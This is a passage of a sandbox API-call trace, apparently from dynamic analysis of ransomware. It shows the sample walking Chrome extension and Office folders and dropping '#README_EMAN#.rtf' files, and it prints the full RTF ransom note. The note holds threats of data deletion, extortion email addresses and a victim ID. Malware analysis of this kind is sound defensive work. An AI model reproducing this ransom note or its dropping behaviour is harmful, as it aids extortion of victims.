[0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 3 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 3 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\", cchCount2=118) returned 2 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\", cchCount2=134) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\", cchCount2=134) returned 1 [0283.687] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\", cchCount2=134) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\", cchCount2=134) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\", cchCount2=134) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\", cchCount2=134) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchCount2=51) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount1=132, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchCount2=51) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchCount2=51) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount1=103, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchCount2=51) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchCount2=51) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\bn\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\", cchCount2=130) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sw\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\", cchCount2=130) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\", cchCount1=103, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", cchCount1=51, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 1 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 3 [0283.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\", cchCount2=130) returned 1 [0283.691] GetFileAttributesW (lpFileName="C:\\Recovery\\WindowsRE\\#README_EMAN#.rtf" (normalized: "c:\\recovery\\windowsre\\#readme_eman#.rtf")) returned 0x2020 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\en-us.16\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\F227E87A-B6B1-42DD-93D7-CC66C1F69C7E\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\f227e87a-b6b1-42dd-93d7-cc66c1f69c7e\\x-none.16\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\downloadedsettings\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cache\\cache\\#readme_eman#.rtf")) returned 0x20 [0283.691] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cookie\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cookie\\#readme_eman#.rtf")) returned 0xffffffff [0283.691] GetLastError () returned 0x2 [0283.691] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cookie\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrocef\\dc\\acrobat\\cookie\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 